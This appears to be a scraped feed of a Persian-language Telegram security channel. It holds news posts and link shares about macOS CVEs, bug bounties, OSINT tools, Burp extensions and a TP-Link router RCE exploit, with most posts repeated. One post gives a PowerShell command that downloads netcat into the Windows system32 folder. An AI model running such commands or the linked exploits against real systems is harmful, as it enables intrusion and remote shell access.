This media is not supported in your browser
VIEW IN TELEGRAM
سه آسیب پذیری در سیستم عامل مک!
اولین آسیب پذیری فقط با دیدن یک صفحه وب، به هکر اجازه میدهد یک دیسک را بصورت خودکار در سیستم قربانی دانلود و مانت کند (CVE-2017-13890)
آسیب پذیری دوم در نحوه استفاده از ایمیج های دیسک و فایلهای bundle وجود داشت که به هکر اجازه اجرای برنامه های دلخواه را میدهد (CVE-2018-4176)
و اما آسیب پذیری سوم به هکر اجازه دور زدن برنامه ضد بدافزاری Gatekeeper را میدهد که در نهایت منجر به اجرای دستور دلخواه بر روی سیستم قربانی میشود (CVE-2018-4175)
همانطور که در ویدیو میبینید هکرها توانستند با بکارگیری این سه آسیب پذیری به صورت همزمان، کنترل سیستم را در دست بگیرند!
منبع:
https://thehackernews.com/2018/11/apple-macos-zeroday.html
#0day
#macos
#exploit
#news
@sec_nerd
اولین آسیب پذیری فقط با دیدن یک صفحه وب، به هکر اجازه میدهد یک دیسک را بصورت خودکار در سیستم قربانی دانلود و مانت کند (CVE-2017-13890)
آسیب پذیری دوم در نحوه استفاده از ایمیج های دیسک و فایلهای bundle وجود داشت که به هکر اجازه اجرای برنامه های دلخواه را میدهد (CVE-2018-4176)
و اما آسیب پذیری سوم به هکر اجازه دور زدن برنامه ضد بدافزاری Gatekeeper را میدهد که در نهایت منجر به اجرای دستور دلخواه بر روی سیستم قربانی میشود (CVE-2018-4175)
همانطور که در ویدیو میبینید هکرها توانستند با بکارگیری این سه آسیب پذیری به صورت همزمان، کنترل سیستم را در دست بگیرند!
منبع:
https://thehackernews.com/2018/11/apple-macos-zeroday.html
#0day
#macos
#exploit
#news
@sec_nerd
فیسبوک از هکرها خواست برای کشف آسیب پذیری در محصولات این شرکت شامل فیسبوک، اینستاگرام، واتس اپ و oculus تلاش کنند و جایزه دریافت نمایند.
فیسبوک با افزایش جوایز خود، آنها را به دو دسته تقسیم کرده است.
در دسته اول ۲۵ هزار دلار به باگی پرداخت میشود که نیاز به دخالت کاربر در آن وجود داشته باشد و ۴۰ هزار دلار نیز به باگهایی اعطا میشود که نیاز به دخالت کاربر در آنها وجود نداشته باشد.
منبع:
https://www.hackread.com/facebook-bug-bounty-hacking-facebook-instagram-whatsapp/
#facebook
#news
#bugbounty
#whatsapp
#instagram
@sec_nerd
فیسبوک با افزایش جوایز خود، آنها را به دو دسته تقسیم کرده است.
در دسته اول ۲۵ هزار دلار به باگی پرداخت میشود که نیاز به دخالت کاربر در آن وجود داشته باشد و ۴۰ هزار دلار نیز به باگهایی اعطا میشود که نیاز به دخالت کاربر در آنها وجود نداشته باشد.
منبع:
https://www.hackread.com/facebook-bug-bounty-hacking-facebook-instagram-whatsapp/
#news
#bugbounty
@sec_nerd
HackRead
Bug Bounty: Earn $40,000 for hacking Facebook, Instagram or WhatsApp
Got skills?
دستورات کاربردی ویندوزی برای مهاجمان
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
#windows
#cmd
@sec_nerd
https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html
#windows
#cmd
@sec_nerd
JPCERT/CC Eyes
Windows Commands Abused by Attackers - JPCERT/CC Eyes
Hello again, this is Shusei Tomonaga from the Analysis Center. In Windows OS, various commands (hereafter “Windows commands”) are installed by default. However, what is actually used by general users is just a small part of it. On the other...
Online #OSINT CheckList [Reconnaissance] :
* Dnstrails - Best for enumerating Subdomains
* Viewdns.info - Various tools [Finding Origin IP behind Cloudflare, and so on) - Recommended
* Google ASE aka Google Dorking
* Pentest-tools
* Dumpster
* VirusTotal
* Crt.sh - Best for enumerating related domains
* Dnsgoodies
#security #infosec #bugbounty #enumeration #pentest #redteam #cybersecurity
@sec_nerd
* Dnstrails - Best for enumerating Subdomains
* Viewdns.info - Various tools [Finding Origin IP behind Cloudflare, and so on) - Recommended
* Google ASE aka Google Dorking
* Pentest-tools
* Dumpster
* VirusTotal
* Crt.sh - Best for enumerating related domains
* Dnsgoodies
#security #infosec #bugbounty #enumeration #pentest #redteam #cybersecurity
@sec_nerd
ابزار trape برای جمع آوری اطلاعات از اشخاص در اینترنت
https://github.com/jofpin/trape
#osint
#enum
@sec_nerd
https://github.com/jofpin/trape
#osint
#enum
@sec_nerd
This media is not supported in your browser
VIEW IN TELEGRAM
پس از سقوط ارزش بیت کوین به زیر ۴ هزار دلار، چینی ها دستگاه های ماینر خود را به حراج گذاشته اند!
https://twitter.com/DoveyWan/status/1066678209679249408
#btc
#news
#china
@sec_nerd
https://twitter.com/DoveyWan/status/1066678209679249408
#btc
#news
#china
@sec_nerd
لیستی از افزونه های کاربردی burpsuite:
تست نفوذ اپلیکیشن های NET. :
https://github.com/allfro/dotNetBeautifier
Java Deserialization Scanner:
https://github.com/federicodotta/Java-Deserialization-Scanner
Java Serial Killer:
https://github.com/NetSPI/JavaSerialKiller
و ادامه لیست در لینک زیر:
https://github.com/snoopysecurity/awesome-burp-extensions
#burpsuite
#web
#pentest
@sec_nerd
تست نفوذ اپلیکیشن های NET. :
https://github.com/allfro/dotNetBeautifier
Java Deserialization Scanner:
https://github.com/federicodotta/Java-Deserialization-Scanner
Java Serial Killer:
https://github.com/NetSPI/JavaSerialKiller
و ادامه لیست در لینک زیر:
https://github.com/snoopysecurity/awesome-burp-extensions
#burpsuite
#web
#pentest
@sec_nerd
GitHub
allfro/dotNetBeautifier
A BurpSuite extension for beautifying .NET message parameters and hiding some of the extra clutter that comes with .NET web apps (i.e. __VIEWSTATE). - allfro/dotNetBeautifier
دانلود فایل با استفاده از پاورشل (معادل wget در لینوکس)
Invoke-WebRequest "https://domain.tld/nc.exe" -OutFile "C:\\windows\\system32\\nc.exe"
#windows
#ps
@sec_nerd
Invoke-WebRequest "https://domain.tld/nc.exe" -OutFile "C:\\windows\\system32\\nc.exe"
#windows
#ps
@sec_nerd
شرکت uber بخاطر ناتوانی در محافظت از اطلاعات مشتریانش توسط دیدبان حریم شخصی بریتانیا به میزان ۴۹۱ هزار دلار جریمه شد.
این جریمه بخاطر هک شدن اوبر در سال ۲۰۱۶ و دزدیده شدن اطلاعات حدود 2.7 میلیون کاربر بریتانیایی اعمال شده است.
منبع:
https://www.engadget.com/2018/11/27/uber-ico-uk-fine-cyber-attack/
#news
#uber
#breach
#uk
@sec_nerd
این جریمه بخاطر هک شدن اوبر در سال ۲۰۱۶ و دزدیده شدن اطلاعات حدود 2.7 میلیون کاربر بریتانیایی اعمال شده است.
منبع:
https://www.engadget.com/2018/11/27/uber-ico-uk-fine-cyber-attack/
#news
#uber
#breach
#uk
@sec_nerd
Engadget
Uber fined £385,000 in the UK for 2016 cyber-attack
Around 2.7 million UK users were affected by the breach.
پلیس فدرال امریکا (FBI) برای به دام انداختن اسکمرها دست به ساخت وبسایت جعلی fedEx زد (fedEx یک سرویس ارسال محموله های پستی است)
این اسکمرها وانمود میکردند که فرد قابل اعتمادی هستند و شرکتها را مجاب به ارسال مبالغ بالا میکردند.در این عملیات FBI با ساخت این وبسایت و همچنین ایجاد داکیومنت های آلوده ی آفیس که منجر به برملا شدن آی پی اصلی مجرمان میشد، موفق به یافتن مکان آنان شد.
پلیس ها آدرس وبسایت جعلی را به مجرمان دادند، آنها همچنین خطایی را در وبسایت برای کاربرانی که از پروکسی استفاده میکنند به نمایش درآوردند. ابتدا آی پی های متعددی به وبسایت متصل شدند که برخی از آنها نیز از پروکسی استفاده میکردند. پلیس برای مشخص شدن آی پی ها از روش بازرسی شبکه (NIT) بهره برد و با کمک داکیومنتهای ورد توانست آی پی اصلی مجرمان را بدست آورد.
اطلاعات بیشتر:
https://motherboard.vice.com/en_us/article/d3b3xk/the-fbi-created-a-fake-fedex-website-to-unmask-a-cybercriminal
#news
#usa
#fbi
#scam
@sec_nerd
این اسکمرها وانمود میکردند که فرد قابل اعتمادی هستند و شرکتها را مجاب به ارسال مبالغ بالا میکردند.در این عملیات FBI با ساخت این وبسایت و همچنین ایجاد داکیومنت های آلوده ی آفیس که منجر به برملا شدن آی پی اصلی مجرمان میشد، موفق به یافتن مکان آنان شد.
پلیس ها آدرس وبسایت جعلی را به مجرمان دادند، آنها همچنین خطایی را در وبسایت برای کاربرانی که از پروکسی استفاده میکنند به نمایش درآوردند. ابتدا آی پی های متعددی به وبسایت متصل شدند که برخی از آنها نیز از پروکسی استفاده میکردند. پلیس برای مشخص شدن آی پی ها از روش بازرسی شبکه (NIT) بهره برد و با کمک داکیومنتهای ورد توانست آی پی اصلی مجرمان را بدست آورد.
اطلاعات بیشتر:
https://motherboard.vice.com/en_us/article/d3b3xk/the-fbi-created-a-fake-fedex-website-to-unmask-a-cybercriminal
#news
#usa
#fbi
#scam
@sec_nerd
Vice
The FBI Created a Fake FedEx Website to Unmask a Cybercriminal
In an attempt to identify someone tricking a company into handing over cash, the FBI created a fake FedEx website, as well as deployed booby-trapped Word documents to reveal fraudsters' IP addresses.
تست نفوذ دستگاههای صنعتی (PLC)
https://medium.com/tenable-techblog/plc-bug-hunt-fa3a0aeae9ab
#scada
#pentest
@sec_nerd
https://medium.com/tenable-techblog/plc-bug-hunt-fa3a0aeae9ab
#scada
#pentest
@sec_nerd
اکسپلویت اجرای دستور از راه دور بر روی روتر TP-Link Archer C5
(CVE-2018-19537)
https://github.com/JackDoan/TP-Link-ArcherC5-RCE/
#exploit
#network
#rce
#tplink
@sec_nerd
(CVE-2018-19537)
https://github.com/JackDoan/TP-Link-ArcherC5-RCE/
#exploit
#network
#rce
#tplink
@sec_nerd
GitHub
GitHub - JackDoan/TP-Link-ArcherC5-RCE: CVE-2018-19537
CVE-2018-19537. Contribute to JackDoan/TP-Link-ArcherC5-RCE development by creating an account on GitHub.
رایت آپ
از آپلود داکیومنت word تا stored xss
https://www.coalfire.com/The-Coalfire-Blog/May-2018/Microsoft-Word-Document-Upload-to-Stored-XSS
#writeup
#office
#web
#pentest
#xss
#bugbounty
@sec_nerd
از آپلود داکیومنت word تا stored xss
https://www.coalfire.com/The-Coalfire-Blog/May-2018/Microsoft-Word-Document-Upload-to-Stored-XSS
#writeup
#office
#web
#pentest
#xss
#bugbounty
@sec_nerd